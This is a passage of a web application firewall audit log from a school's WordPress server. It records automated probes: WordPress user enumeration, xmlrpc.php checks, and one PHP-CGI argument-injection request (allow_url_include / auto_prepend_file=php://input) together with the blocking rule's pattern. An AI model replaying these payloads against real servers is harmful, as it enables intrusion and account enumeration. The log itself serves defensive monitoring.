charset=iso-8859-1 --4ac9107b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747501016917843 2958 (- - -) Stopwatch2: 1747501016917843 2958; combined=1341, p1=494, p2=820, p3=0, p4=0, p5=27, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4ac9107b-Z-- --d7135b0d-A-- [17/May/2025:23:56:58 +0700] aCi_2gTOsBn9MSWb6WIw4QAAAJc 103.236.140.4 43886 103.236.140.4 8181 --d7135b0d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.183.27 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.183.27 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d7135b0d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d7135b0d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747501018900467 2312 (- - -) Stopwatch2: 1747501018900467 2312; combined=1007, p1=305, p2=679, p3=0, p4=0, p5=23, sr=49, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d7135b0d-Z-- --89720d15-A-- [17/May/2025:23:57:00 +0700] aCi_3BKi5m5upc8uMd56wAAAAMo 103.236.140.4 43956 103.236.140.4 8181 --89720d15-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.82.198 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.82.198 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --89720d15-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --89720d15-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747501020303474 2845 (- - -) Stopwatch2: 1747501020303474 2845; combined=1306, p1=420, p2=853, p3=0, p4=0, p5=33, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --89720d15-Z-- --d386c03a-A-- [17/May/2025:23:57:03 +0700] aCi_3xKi5m5upc8uMd56_AAAAMY 103.236.140.4 44162 103.236.140.4 8181 --d386c03a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.90.72 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.90.72 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d386c03a-C-- demo.sayHello --d386c03a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d386c03a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747501023747333 20388 (- - -) Stopwatch2: 1747501023747333 20388; combined=4484, p1=582, p2=3657, p3=46, p4=52, p5=87, sr=65, sw=60, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d386c03a-Z-- --e7b1ea04-A-- [17/May/2025:23:57:06 +0700] aCi_4hKi5m5upc8uMd57MgAAAMM 103.236.140.4 44330 103.236.140.4 8181 --e7b1ea04-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.183.27 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.183.27 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e7b1ea04-C-- demo.sayHello --e7b1ea04-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e7b1ea04-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747501026763716 4952 (- - -) Stopwatch2: 1747501026763716 4952; combined=3715, p1=451, p2=3057, p3=42, p4=38, p5=76, sr=54, sw=51, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e7b1ea04-Z-- --3fca601c-A-- [17/May/2025:23:57:09 +0700] aCi_5RKi5m5upc8uMd57ZgAAANM 103.236.140.4 44472 103.236.140.4 8181 --3fca601c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.82.198 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.82.198 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3fca601c-C-- demo.sayHello --3fca601c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3fca601c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747501029582243 4870 (- - -) Stopwatch2: 1747501029582243 4870; combined=3636, p1=454, p2=2958, p3=50, p4=31, p5=84, sr=63, sw=59, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3fca601c-Z-- --40794236-A-- [17/May/2025:23:58:23 +0700] aCjALwTOsBn9MSWb6WIyYAAAAJE 103.236.140.4 48372 103.236.140.4 8181 --40794236-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.198.235 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.198.235 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --40794236-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --40794236-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747501103708836 3172 (- - -) Stopwatch2: 1747501103708836 3172; combined=1413, p1=488, p2=896, p3=0, p4=0, p5=29, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --40794236-Z-- --5dd3ff1f-A-- [17/May/2025:23:58:31 +0700] aCjANxKi5m5upc8uMd5-DAAAAME 103.236.140.4 48892 103.236.140.4 8181 --5dd3ff1f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.198.235 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.198.235 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5dd3ff1f-C-- demo.sayHello --5dd3ff1f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5dd3ff1f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747501111723782 6895 (- - -) Stopwatch2: 1747501111723782 6895; combined=4918, p1=686, p2=3975, p3=38, p4=42, p5=106, sr=85, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5dd3ff1f-Z-- --0b3b322f-A-- [17/May/2025:23:59:41 +0700] aCjAfQTOsBn9MSWb6WI0YgAAAJM 103.236.140.4 53908 103.236.140.4 8181 --0b3b322f-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.92.111.94 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.92.111.94 X-Forwarded-Proto: http Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --0b3b322f-C-- --0b3b322f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0b3b322f-E-- --0b3b322f-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747501181548902 4570 (- - -) Stopwatch2: 1747501181548902 4570; combined=3096, p1=460, p2=2597, p3=0, p4=0, p5=38, sr=60, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0b3b322f-Z-- --e7408c65-A-- [18/May/2025:00:00:26 +0700] aCjAqum4kjNN-hEbWjL9lAAAAFA 103.236.140.4 57194 103.236.140.4 8181 --e7408c65-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.85 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.85 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e7408c65-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e7408c65-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747501226685910 2526 (- - -) Stopwatch2: 1747501226685910 2526; combined=1330, p1=424, p2=874, p3=0, p4=0, p5=32, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e7408c65-Z-- --4a7c477c-A-- [18/May/2025:00:00:34 +0700] aCjAshKi5m5upc8uMd6BWwAAAMk 103.236.140.4 57696 103.236.140.4 8181 --4a7c477c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.85 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.85 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4a7c477c-C-- demo.sayHello --4a7c477c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4a7c477c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747501234139696 4677 (- - -) Stopwatch2: 1747501234139696 4677; combined=3409, p1=645, p2=2582, p3=28, p4=28, p5=74, sr=77, sw=52, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4a7c477c-Z-- --855c2246-A-- [18/May/2025:00:13:52 +0700] aCjD0HyxdQCiyU1ENFcRDAAAAA0 103.236.140.4 54030 103.236.140.4 8181 --855c2246-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.111.236 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.111.236 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --855c2246-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --855c2246-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747502032400625 3288 (- - -) Stopwatch2: 1747502032400625 3288; combined=1757, p1=548, p2=1178, p3=0, p4=0, p5=31, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --855c2246-Z-- --86afde44-A-- [18/May/2025:00:13:58 +0700] aCjD1um4kjNN-hEbWjISMgAAAEM 103.236.140.4 54506 103.236.140.4 8181 --86afde44-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.111.236 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.111.236 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --86afde44-C-- demo.sayHello --86afde44-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --86afde44-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747502038941171 6101 (- - -) Stopwatch2: 1747502038941171 6101; combined=4690, p1=636, p2=3803, p3=44, p4=55, p5=89, sr=64, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --86afde44-Z-- --29723f54-A-- [18/May/2025:00:18:50 +0700] aCjE-um4kjNN-hEbWjIYxQAAAE4 103.236.140.4 44202 103.236.140.4 8181 --29723f54-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.85.45 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.85.45 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --29723f54-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --29723f54-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747502330494577 3625 (- - -) Stopwatch2: 1747502330494577 3625; combined=2042, p1=628, p2=1380, p3=0, p4=0, p5=34, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --29723f54-Z-- --ed0a7e5e-A-- [18/May/2025:00:18:57 +0700] aCjFARKi5m5upc8uMd6glwAAAMA 103.236.140.4 44648 103.236.140.4 8181 --ed0a7e5e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.85.45 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.85.45 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ed0a7e5e-C-- demo.sayHello --ed0a7e5e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ed0a7e5e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747502337803627 5659 (- - -) Stopwatch2: 1747502337803627 5659; combined=4564, p1=639, p2=3714, p3=39, p4=54, p5=72, sr=55, sw=46, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ed0a7e5e-Z-- --46071d69-A-- [18/May/2025:00:21:35 +0700] aCjFnwTOsBn9MSWb6WJTxQAAAIs 103.236.140.4 52980 103.236.140.4 8181 --46071d69-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.169.121 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.169.121 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --46071d69-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --46071d69-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747502495067539 7666 (- - -) Stopwatch2: 1747502495067539 7666; combined=5959, p1=475, p2=5409, p3=0, p4=0, p5=73, sr=78, sw=2, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --46071d69-Z-- --b8766a50-A-- [18/May/2025:00:21:41 +0700] aCjFpQTOsBn9MSWb6WJT2QAAAI4 103.236.140.4 53346 103.236.140.4 8181 --b8766a50-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.169.121 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.169.121 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b8766a50-C-- demo.sayHello --b8766a50-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b8766a50-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747502501195876 5305 (- - -) Stopwatch2: 1747502501195876 5305; combined=4012, p1=587, p2=3182, p3=39, p4=53, p5=91, sr=55, sw=60, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b8766a50-Z-- --ab77e010-A-- [18/May/2025:00:24:15 +0700] aCjGPxKi5m5upc8uMd6p3gAAAMs 103.236.140.4 36222 103.236.140.4 8181 